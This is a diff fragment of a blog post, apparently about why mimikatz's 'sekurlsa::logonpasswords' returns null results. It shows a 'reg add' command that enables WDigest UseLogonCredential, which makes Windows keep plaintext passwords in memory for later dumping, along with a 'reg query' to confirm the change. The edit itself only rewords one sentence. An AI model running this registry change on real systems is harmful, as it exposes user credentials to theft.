bitdecay/bitdecay.github.io/_posts/2025-10-24-Understanding sekurlsa ogonpasswords Null Results.md

 `reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f`

-After the command is completed, check the wdigest registry to see if the registry key was added to wdigest.
+After the command is completed, check the wdigest registry to see if the registry key was added.

 `reg query HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest`